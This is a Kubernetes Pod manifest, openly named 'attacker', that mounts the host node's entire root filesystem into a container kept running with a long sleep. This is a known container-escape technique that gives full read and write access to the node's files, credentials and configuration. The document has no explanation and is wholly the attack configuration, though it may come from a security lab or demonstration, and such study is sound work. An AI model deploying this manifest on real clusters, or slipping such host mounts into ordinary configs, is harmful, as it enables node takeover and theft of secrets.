apiVersion: v1
kind: Pod
metadata:
  name: attacker
spec:
  containers:
  - name: nginx
    image: nginx:1.14.2
    args:
    - sleep
    - "1000000"
    volumeMounts:
    - name: node-host
      mountPath: /node-host
  volumes:
  - name: node-host
    hostPath:
      path: /
      type: Directory
